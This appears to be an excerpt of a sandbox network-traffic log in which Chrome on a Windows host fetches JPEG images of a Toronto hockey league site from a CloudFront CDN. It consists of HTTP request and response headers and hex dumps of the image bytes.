                                                                                                                          2025-01-13 21:01:18 UTC2590INData Raw: 47 28 01 2e 50 a1 ca 30 8c a3 aa 01 30 11 84 a8 40 26 d0 50 1a 02 76 12 61 00 60 1e a8 da 02 30 8e 50 06 11 b5 09 79 40 26 d4 6d 3e 69 52 65 00 85 a5 26 d2 9f 94 65 00 c0 d4 bb 7d 52 a1 00 9b 0f 9a 36 94 b9 f5 47 28 06 f7 65 26 c2 13 d2 fd 50 11 e0 f9 26 be 46 c6 32 f7 06 8f 52 a5 25 73 5f 6d 57 9d 6b 1e ae 9a db 6d a8 a9 34 8f 68 2c 6c 23 a0 3e aa a4 bb 83 7a dd 35 ad 86 ce d7 3a b2 e7 4f 1e 3c 37 8c aa cd af b6 bd 3b 79 d4 54 f6 5a 09 1d 2c 93 92 d0 f1 d3 2b 43 59 fb 12 d6 da a6 56 cd 59 2f 73 1b b9 2e 9e 42 4f d9 6d ad 09 f8 79 a2 d3 57 0a 6b 9d 65 c2 49 ea 60 70 7b 43 06 d6 82 ad ae c8 57 ab 37 17 29 c0 a3 1c 61 18 58 90 4f a2 f3 55 d7 d2 d0 c6 e9 27 95 91 b5 a3 24 b8 e1 61 f5 a6 a0 75 86 81 8f 8c 81 24 8e da dc ad 17 da 66 ab ac 75 9a 47 be a9 e5 d2
                                                                                                                          Data Ascii: G(.P00@&Pva`0Py@&m>iRe&e}R6G(e&P&F2R%s_mWkm4h,l#>z5:O<7;yTZ,+CYVY/s.BOmyWkeI`p{CW7)aXOU'$au$fuG


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          80192.168.11.204989454.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC444OUTGET /app/uploads/gthl/2022/10/26123500/400X350-SAFE-SPORT-COMPLAINT-PROCESS-EN-320x280.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:18 UTC494INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 20946
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:18 GMT
                                                                                                                          Last-Modified: Wed, 26 Oct 2022 16:35:01 GMT
                                                                                                                          ETag: "5f5d41fb32402384828fd1a13ef1e79d"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Hit from cloudfront
                                                                                                                          Via: 1.1 ead5a4c5fbab9ab09302c9bd4c52b4b4.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: w4Wev78qsU8-VbfQFoFwvKqDZn7IuOfqhXgH6sn4EgilztA7irRPSQ==
                                                                                                                          Age: 1
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff e1 03 8f 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 39 63 63 63 34 64 65 39 33 2c 20 32 30 32 32 2f 30 33 2f 31 34 2d 31 34 3a 30 37 3a 32 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20
                                                                                                                          Data Ascii: JFIFExifII*http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF
                                                                                                                          2025-01-13 21:01:18 UTC2804INData Raw: 1b fc 74 03 df 9f a1 bc 53 7b fa 8d fe 3a 01 ef cf d0 de 29 bd fd 46 ff 00 1d 00 f7 e7 e8 6f 14 de fe a3 7f 8e 80 7b f3 f4 37 8a 6f 7f 51 bf c7 40 3d f9 fa 1b c5 37 bf a8 df e3 a0 1e fc fd 0d e2 9b df d4 6f f1 d0 0f 7e 7e 86 f1 4d ef ea 37 f8 e8 07 bf 3f 43 78 a6 f7 f5 1b fc 74 03 df 9f a1 bc 53 7b fa 8d fe 3a 01 ef cf d0 de 29 bd fd 46 ff 00 1d 01 7b 62 ee b8 d1 97 fb dc 0b 44 6b 65 e1 0f 4e 90 88 ed a9 68 6f 75 2a 52 80 04 e1 5d 1c 68 09 ca 80 50 0a 01 40 28 0d 1f 6d df 25 1a 97 e8 9f f9 26 80 fc e4 3d 26 80 f9 40 5c 43 b7 cc b8 b9 c9 42 89 22 53 98 ce e3 2d 95 9c 79 85 01 e2 44 67 e2 3c a6 64 32 e3 2e a4 e1 48 71 25 2a 07 ca 0d 01 52 15 b2 75 c9 65 10 61 49 94 a4 8c 94 b0 d2 96 40 f4 0a 02 8b ac ba c3 8a 69 d6 d6 db 89 38 28 5a 48 20 f9 8d 01 71 26 d5
                                                                                                                          Data Ascii: tS{:)Fo{7oQ@=7o~~M7?CxtS{:)F{bDkeNhou*R]hP@(m%&=&@\CB"S-yDg<d2.Hq%*RueaI@i8(ZH q&
                                                                                                                          2025-01-13 21:01:18 UTC1758INData Raw: 1c d9 df 00 d0 0e 6c ef 80 68 07 36 77 c0 34 03 9b 3b e0 1a 01 cd 9d f0 0d 00 e6 ce f8 06 80 73 67 7c 03 40 39 b3 be 01 a0 1c d9 df 00 d0 0e 6c ef 80 68 07 36 77 c0 34 03 9b 3b e0 1a 01 cd 9d f0 0d 00 e6 ce f8 06 80 73 67 7c 03 40 39 b3 be 01 a0 1c d9 df 00 d0 0e 6c ef 80 68 07 36 77 c0 34 03 9b 3b e0 1a 01 cd 9d f0 0d 01 b3 6c c5 97 11 b4 7d 30 4a 0e 3d d4 8d ff 00 71 34 07 e9 4d 00 a0 14 02 80 50 16 d7 2b 6c 4b bc 17 a0 ce 61 32 23 3e 9d d7 1b 57 42 87 65 01 a9 77 95 d9 e7 cd 58 1f 7b db 40 7d ef 2b b3 df 9a b0 7e f7 b6 80 77 95 d9 ef cd 58 3f 7b db 40 3b ca ec f7 e6 ac 1f bd ed a0 1d e5 76 7b f3 56 0f de f6 d0 0e f2 bb 3d f9 ab 07 ef 7b 68 07 79 5d 9e fc d5 83 f7 bd b4 03 bc ae cf 7e 6a c1 fb de da 01 de 57 67 bf 35 60 fd ef 6d 00 ef 2b b3 df 9a b0 7e
                                                                                                                          Data Ascii: lh6w4;sg|@9lh6w4;sg|@9lh6w4;l}0J=q4MP+lKa2#>WBewX{@}+~wX?{@;v{V={hy]~jWg5`m+~


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          81192.168.11.204989654.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC683OUTGET /app/uploads/gthl/2024/12/12194650/U10-AA-West-Mall-Lightning-GTHL-Community-2-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:18 UTC488INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 107606
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:19 GMT
                                                                                                                          Last-Modified: Fri, 13 Dec 2024 00:46:52 GMT
                                                                                                                          ETag: "b2eae4c054996b0af3fb67696e2f8d86"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 cdb7a265f783ce0c07661e9c6820c2c4.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: y8w7V5rbB5BIbDCGoJ3bWBjCx8nm6g2HmmSqUbBZx_1uYkrELTFpZg==
                                                                                                                          2025-01-13 21:01:18 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 06 03 04 05 07 08 02 01 00 09 ff c4 00 50 10 00 01 03 02 04 05 02 04 04 03 06 04 02 07 05 09 01 02 03 04 05 11 00 06 12 21 07 13 31 41 51 22 61 08 14 32 71 15 23 81 91 42
                                                                                                                          Data Ascii: JFIF&&CC"P!1AQ"a2q#B
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 4a 86 ad 47 db 1c 65 3c f5 96 b3 8c 12 ee 5f a9 b3 28 23 ea 4a 4f ad 3b f7 1d b1 86 73 ae 75 6e b5 9c 6b d9 81 4e a2 62 66 2f 4c 25 05 92 1a 20 58 69 1d b6 ef 89 ee 0a cb 14 2a ed 3e a5 48 ae 3f 16 45 71 49 8c eb 6b 70 24 0d 06 ea d8 f6 f7 c4 61 36 e3 41 3a be 56 da 70 ef a4 f4 c7 4c c3 8c fa 80 24 24 1c 35 66 a1 16 53 61 c6 64 21 d0 0e 92 a4 1b 8b fd f1 c0 a9 34 35 06 ca 55 a3 ad 88 d8 e0 f4 52 02 12 b2 e8 cc 07 08 0e 03 86 c6 96 ca 7a 2c 63 87 ea 2b 50 2b b7 41 db 0c d5 54 d3 e7 0e 01 cb 89 1e 12 cf d3 10 a0 48 58 bf 8c 46 3d 05 c4 12 9b 63 a7 6a b7 dd 27 7c 35 76 a8 be c4 93 83 b5 af 28 4e 21 7d f2 4e 5f e9 c7 0a 84 be d8 f8 54 d5 dc 9c 70 aa 95 c1 b2 b0 50 c2 87 76 91 71 95 a0 91 63 84 48 70 fd 20 e1 c1 98 54 37 df 1e b6 e6 a3 74 8d f0 bb 57 5a 6c 18
                                                                                                                          Data Ascii: JGe<_(#JO;sunkNbf/L% Xi*>H?EqIkp$a6A:VpL$$5fSad!45URz,c+P+ATHXF=cj'|5v(N!}N_TpPvqcHp T7tWZl
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: d9 a7 38 d1 b2 f5 0c 54 99 a8 43 59 5b a8 6d 3a 1e 0a dc 9f 6f 6c 02 e7 c9 ae bf 99 cc 88 8b 59 6c b6 d2 92 46 e0 dc 5f 19 75 15 27 52 90 97 96 42 40 b8 17 b0 d5 e7 13 70 b8 89 9a a9 4d 29 50 ea 4b 77 6d 05 2f 8e 65 93 ec 4e e3 0f 76 a6 5e 0d 84 01 a7 6c 1b 9a e5 7b 52 6a cd 4c 92 e0 65 6b 2a 61 d0 ca f5 74 be 22 eb 93 03 d9 ea 04 68 ea 2e 20 85 95 a0 f9 1f e5 8a 8f 2e 71 3e 75 01 87 ca a1 7c cb ef be 1e e6 3a e1 b0 f6 b6 10 73 3d 55 9f ae 3b 98 3e 69 2c c8 5d f9 7b 5d 2d df c7 9c 46 6c ac da 4b bb a9 0e 64 81 c3 6f 65 a0 64 ad 69 09 4a 1b 01 c2 9d c5 c7 4f 38 10 a4 b5 ab 8b 12 63 a9 24 96 69 a8 b9 1b 0d c8 ed 8a df 2f 67 2a 9b 39 91 35 ca e5 55 d9 8c ac fe 63 22 e1 21 23 a0 00 78 c5 b1 43 ac 65 89 33 ce 70 84 c2 d1 50 9a da 5a 75 0e b9 f4 36 0e db 79 c1
                                                                                                                          Data Ascii: 8TCY[m:olYlF_u'RB@pM)PKwm/eNv^l{RjLek*at"h. .q>u|:s=U;>i,]{]-FlKdoediJO8c$i/g*95Uc"!#xCe3pPZu6y
                                                                                                                          2025-01-13 21:01:18 UTC9842INData Raw: c5 32 91 7d 97 cf f3 ca d8 c9 16 ac 7f 8b 1c db 90 73 0d 1a 2f 0e 66 34 b4 d7 18 7c 54 22 cc 68 0d 0c ab a2 d2 4f 75 28 12 2d 8c 6b 98 72 8e 5a a7 d4 4a a5 d5 24 ad 1c 9b 92 80 12 0a ef 7d af fd 70 d6 44 aa cc 65 2b fb 5b 53 54 e8 eb 5f 30 3c 5e 25 c4 a8 f5 b1 26 e7 0d aa f5 ba 2c 84 26 5f 2d c9 ca 41 05 21 4e 59 26 dd bf 6c 5f c6 e0 c6 06 85 9f 92 dc 4b 82 d7 1f 0a 5c 0d e1 b6 6a e1 6e 62 cf 15 2a 18 a9 4e 5a 24 c1 87 f3 9e b4 34 a0 de ca 4a 47 f1 6f 7b 9f 18 04 e0 27 04 28 94 b2 fe 6f ac 72 67 38 a9 2b 89 01 0e b4 0a 02 c2 ce a5 69 3d 6d 6c 5e 5f 00 ac a6 ab c2 8a dd 41 c4 b7 1e 3b d5 77 92 84 38 fa 40 bf 2c 00 02 7b 5a ff 00 ad f1 58 e5 c7 2a b1 dd 7a 8b f3 f6 6e 85 3e a0 97 c2 55 b5 cb 85 40 0f 7b 28 61 fa d4 bd 2c 06 3a 3e 09 f2 b2 be a4 9e 68 b1 4f
                                                                                                                          Data Ascii: 2}s/f4|T"hOu(-krZJ$}pDe+[ST_0<^%&,&_-A!NY&l_K\jnb*NZ$4JGo{'(org8+i=ml^_A;w8@,{ZX*zn>U@{(a,:>hO
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 7c 33 7f a1 17 e9 f7 18 fa 42 78 59 24 6d 95 83 8a 5e 4d a9 62 b1 d6 64 66 ef ea ac 7e 2a 65 9a c5 3b 33 fe 19 1e 72 93 0d 51 12 f2 c1 df 75 29 5d fb 6c 06 d8 06 89 4f 65 e7 c5 3e 9b 19 6e 28 6c a5 a7 71 7f 7c 12 66 1a bd 09 50 92 25 4a cc 12 2a 4e 25 29 95 22 72 ec 9d 85 88 03 bf b6 3b a0 67 9c 99 42 67 45 3e 9d 21 d5 84 fa d4 1b 24 9f b9 c5 71 73 58 68 70 bc fb 50 88 b2 53 b3 b7 c2 96 cb 59 7e 72 d0 19 79 a5 04 a3 a7 5c 1e 32 cb 91 a2 25 2c 10 97 a3 81 a9 24 ee 7e d8 09 47 17 c8 49 54 1c a3 21 7b 6c a7 2c 94 e3 c8 dc 43 66 a0 e7 fc fd 2d 31 54 55 70 a6 d7 72 3d b0 d6 ba c9 0a 91 d1 39 bc 3b ca 02 e3 9d 0a b3 33 36 39 54 cb f4 c6 d6 99 ac 34 a5 ba 14 01 d6 05 8e 0b be 0f f2 9e 6e a8 f1 a6 8a f6 61 a2 29 74 ea 4a 17 2d d7 7f 81 0a 02 c9 d4 7b 75 c1 33 d2
                                                                                                                          Data Ascii: |3BxY$m^Mbdf~*e;3rQu)]lOe>n(lq|fP%J*N%)"r;gBgE>!$qsXhpPSY~ry\2%,$~GIT!{l,Cf-1TUpr=9;369T4na)tJ-{u3
                                                                                                                          2025-01-13 21:01:18 UTC1024INData Raw: 8a 51 51 4b 29 be e7 af 4c 1a d1 6a f9 4a 32 52 d7 cd 21 bb 0e aa 4d b0 31 4c e1 d6 94 a7 47 a0 9e e0 62 51 3c 3c 61 85 19 12 a5 13 a7 73 73 db 12 31 32 f2 63 1c 46 d6 aa ac f9 70 b2 3d 92 4c e3 ff 00 7e 29 1b 39 5e a4 22 21 5d 3a 4b 6f 38 a1 64 84 ef 8a fa b3 32 a8 e2 55 19 6c 73 50 f2 ba 5e d7 37 c7 a5 96 fe 68 22 37 e5 32 d6 c9 29 ea 7d f0 fa a0 e2 ff 00 0e 52 c3 e1 4e 92 84 25 56 df 75 0c 50 7a 9f 24 e5 e2 48 f9 47 0d 04 ff 00 00 81 a5 e3 33 0b 25 9b 0d ee 23 bf 70 b7 ff 00 0e 6a 4f bb 90 68 71 e4 42 53 6b 34 e6 02 92 85 6e 3d 03 6b e1 f4 b9 71 9b 05 1f 86 94 a0 1f 1f e7 84 b2 dc 27 60 50 20 34 c0 56 93 09 8b 0f 70 81 73 8f aa 08 52 80 52 94 e0 3d f7 b8 38 fc 80 d7 0c 72 6a f9 2e 67 62 f7 1f e6 57 d9 b8 65 b1 e3 46 3e 00 fe 89 9a 24 25 c5 2b 4d 92 9e
                                                                                                                          Data Ascii: QQK)LjJ2R!M1LGbQ<<ass12cFp=L~)9^"!]:Ko8d2UlsP^7h"72)}RN%VuPz$HG3%#pjOhqBSk4n=kq'`P 4VpsRR=8rj.gbWeF>$%+M
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 92 a2 4d 94 1d 48 ca 79 c9 70 3f f5 f5 21 d6 ca dd d2 14 54 16 4a 76 dc 81 d3 12 9c 44 c8 90 22 53 69 f5 e5 14 36 e8 fc a5 5c da d6 1d 6f 8b 02 87 98 99 a8 21 71 2b 2d a2 9f 31 b3 a7 f2 53 e9 58 ec 77 e9 88 9e 34 18 89 c8 4d 38 ec a0 a6 84 b4 24 39 a6 f6 b8 38 87 95 03 5f 0b 88 45 8a 43 bc 0f 95 99 78 a4 88 73 f2 2d 75 70 66 21 6e 22 3f e6 7a 3e ab 5b be 31 aa 39 6e 4c 5a 52 81 ba cd b7 07 1b 13 37 d6 68 95 1c 83 5e 92 c9 92 d7 21 a5 32 a6 e4 36 a4 15 a8 6c 54 90 46 e3 19 57 26 52 3f 16 cc b0 d9 6a 9c fc a4 aa 42 35 b2 05 8a d3 ab 70 14 7a 1b 77 c4 2d 34 18 a2 70 3f 2a 4c d1 3b 78 01 6a 8e 14 52 bf b3 b9 12 9a 66 c4 04 4c 01 d0 d3 96 29 4a 94 3a ed b8 db 05 74 ca 25 42 33 d2 2a e2 a0 84 c2 7c 59 b8 a9 48 56 8f b0 ed 83 aa 56 53 cb 15 14 c7 a6 64 dc bf 5a
                                                                                                                          Data Ascii: MHyp?!TJvD"Si6\o!q+-1SXw4M8$98_ECxs-upf!n"?z>[19nLZR7h^!26lTFW&R?jB5pzw-4p?*L;xjRfL)J:t%B3*|YHVVSdZ
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: a0 15 77 d4 7c 61 db 31 16 4a dd 42 34 e9 4f a2 fb d9 5d f1 68 67 0c a9 96 68 92 81 92 d3 50 d4 94 29 4e 34 da 85 95 e1 69 f3 8a f8 54 63 47 96 a3 15 a3 21 90 36 05 36 05 3d 4f eb 84 6c e2 5e 5a 13 27 c3 76 3f 0e ec 98 15 d5 8b 81 c8 6a 21 b4 d8 b6 94 f5 b8 ea 71 24 f3 b5 ec db 55 66 3b 14 f8 e1 e6 d3 ad 4f 20 04 dd 40 0e a7 ce 3c f9 97 ea 72 8c b4 b6 a4 34 e1 09 4e 84 6c 91 6e 84 7e 98 97 cb 50 9d 76 a2 8a 73 b5 07 a9 ea 94 08 e7 82 02 52 40 f4 fd 81 c3 f7 90 0a 48 29 c4 37 c2 8f af aa 51 8c 86 aa d1 3f e6 82 03 41 c6 d5 a4 38 13 f6 d8 9b 62 66 9f 06 81 02 9d f8 8c 37 de 12 9a 09 0d a3 51 4e a5 91 7e be de d8 f6 a1 91 eb 21 02 54 9a e8 98 94 2f d2 a4 8d 40 79 36 c4 14 ca 79 8e ea 3e 66 7a d6 16 b5 59 40 fa 35 0e d6 ff 00 5c 08 d3 c7 2a cd e1 d0 7b f6 a2
                                                                                                                          Data Ascii: w|a1JB4O]hghP)N4iTcG!66=Ol^Z'v?j!q$Uf;O @<r4Nln~PvsR@H)7Q?A8bf7QN~!T/@y6y>fzY@5\*{
                                                                                                                          2025-01-13 21:01:18 UTC6628INData Raw: b5 fa 76 48 f3 ff 00 6c 4f ce a3 ad 8a 1c da d8 71 0a f9 10 82 86 1a dc ab 51 b1 24 77 b6 06 59 af c6 e5 15 d4 1b 92 95 b8 ab 25 b6 db ea 3c 9b 76 c3 5b 65 11 d4 14 9c 98 94 d6 65 16 20 d4 03 e2 e0 a9 49 64 a0 74 be e4 ff 00 a6 10 7e 23 72 88 72 52 12 34 ab 6d 46 f6 1e c0 f4 c4 68 96 2a 4d 2d ca 24 9e 68 d6 42 b4 0f a5 56 db ef f6 c3 80 c5 59 c6 1b fc 5d f6 12 b7 0d 92 80 81 a9 63 ed 87 57 ca 1a ed 51 19 43 c8 0b 70 e8 56 d6 09 b5 bf 5e d8 4e 5c 45 a1 0b 5b 6e 04 20 59 5d 6e a2 3c 61 ed 3f 2b 4e cc 5f fa b2 98 c4 89 2e 6b 01 40 3c 12 09 3d 01 3e 30 fe 2e 5b aa a6 0d 4e 3f e0 51 24 33 4f 59 61 f9 2b 76 e2 3a fa 7a 6d d7 0d 24 27 6d 25 41 c5 43 31 4b 6a 95 65 29 44 29 0c bb 74 a9 69 bf 40 3a e2 6d 14 f9 35 64 95 45 a7 c6 8a 0a b7 50 59 4a 07 b0 bf 7c 3c ca
                                                                                                                          Data Ascii: vHlOqQ$wY%<v[ee Idt~#rrR4mFh*M-$hBVY]cWQCpV^N\E[n Y]n<a?+N_.k@<=>0.[N?Q$3OYa+v:zm$'m%AC1Kje)D)ti@:m5dEPYJ|<


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          82192.168.11.204989754.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:18 UTC413OUTGET /app/uploads/gthl/2023/06/10112443/Nothers-Big-Box.jpeg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:18 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 51042
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:19 GMT
                                                                                                                          Last-Modified: Sat, 10 Jun 2023 15:24:44 GMT
                                                                                                                          ETag: "60e065ab96e4fa2c0ff0050a5f3d4a11"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 6a615842cf9e2c637f2872ee9b70eb72.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: jObhns_3XOv9-IdH-nP-fkL7a0x4tWa9PGjsL2HwV5TSPJVYwhutUQ==
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 48 00 48 00 00 ff e1 34 be 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 06 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 56 01 1b 00 05 00 00 00 01 00 00 00 5e 01 28 00 03 00 00 00 01 00 02 00 00 02 13 00 03 00 00 00 01 00 01 00 00 87 69 00 04 00 00 00 01 00 00 00 66 00 00 00 c0 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 07 90 00 00 07 00 00 00 04 30 32 32 31 91 01 00 07 00 00 00 04 01 02 03 00 a0 00 00 07 00 00 00 04 30 31 30 30 a0 01 00 03 00 00 00 01 00 01 00 00 a0 02 00 04 00 00 00 01 00 00 01 2c a0 03 00 04 00 00 00 01 00 00 00 fa a4 06 00 03 00 00 00 01 00 00 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 0e 01 1b 00 05 00 00 00
                                                                                                                          Data Ascii: JFIFHH4ExifMM*V^(ifHH02210100,
                                                                                                                          2025-01-13 21:01:18 UTC16384INData Raw: 99 f1 56 b3 fb 40 7c 46 f1 16 b4 be 29 f8 5d a7 c3 71 e0 dd 2d 88 48 2e 53 65 ce be 9d 24 92 d9 db 1e 42 28 e6 06 60 7c e6 eb b5 08 35 f9 9e 75 e2 1e 43 93 66 94 f2 7c 53 72 93 76 a9 38 bb c6 8b e8 9a fb 4f f9 d2 f8 57 77 74 be 83 0b 92 63 31 38 69 62 a9 e8 96 c9 ef 2f f2 f2 ef e4 b5 3e aa f0 1f 8e fc 37 f1 1f c3 76 fe 29 f0 bd c1 9a d6 72 51 d1 d4 a4 d0 4c 9c 49 0c d1 9f 99 24 43 c3 29 e4 1f 6e 6b f4 e9 45 2b 4a 2d 38 b4 9a 69 dd 34 f6 69 ad 1a 7d 19 f3 da ea 9a d5 6e bb 1d 95 40 c2 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 0f 29 f8 f1 ff 00 24 3b e2 27 fd 8b 9a bf fe 91 cb 5e d6 4d ff 00 23 1c 37 f8 e1 ff 00 a5 23 c1 ce ff 00 e4 59 8a ff 00 af 73 ff 00
                                                                                                                          Data Ascii: V@|F)]q-H.Se$B(`|5uCf|Srv8OWwtc18ib/>7v)rQLI$C)nkE+J-8i4i}n@((((((()$;'^M#7#Ys
                                                                                                                          2025-01-13 21:01:18 UTC11757INData Raw: b3 c0 7c 88 94 fb 65 5d c7 b3 57 95 c6 98 cf 6d 98 fb 14 f4 a6 92 f9 bd 5f e8 be 47 b3 c0 b8 1f 61 96 7b 79 2d 6a 36 fe 4b 45 fa bf 99 f0 27 c2 ff 00 8e da 67 ec ff 00 fb 42 7c 41 f1 5e ab a5 4d ab c5 7f 3e a5 64 22 86 45 8d 95 9a f8 49 b8 96 04 63 11 91 8f 7a fd 33 30 c9 e7 99 e5 78 7a 10 9f 2d 94 5e ba fd 9b 7e a7 e5 59 6e 77 0c a7 37 c4 d7 a9 07 24 dc 95 93 b7 da bf e8 7e 80 7c 19 fd b7 bc 37 f1 93 e2 2e 99 f0 ef 4f f0 c5 de 9b 3e a4 b3 b2 cf 2c f1 ba 27 91 0b cc 72 aa 01 39 09 81 f5 af cc 33 5e 12 ad 80 c2 cb 15 3a a9 a5 6d 12 7d 5a 5f a9 fa b6 51 c6 54 73 1c 64 30 70 a2 e2 e5 7d 5b 5d 13 7f a1 f3 1f ed ef a1 8f 14 7e d1 1e 01 f0 d3 4b f6 75 d5 ac 2c ed 0c 80 6e d9 e7 df 4b 1e ec 77 c6 ec e2 be c3 83 6b 7b 1c ab 11 5a d7 e5 6d fd d1 4c f8 be 38 a3 ed
                                                                                                                          Data Ascii: |e]Wm_Ga{y-j6KE'gB|A^M>d"EIcz30xz-^~Ynw7$~|7.O>,'r93^:m}Z_QTsd0p}[]~Ku,nKwk{ZmL8
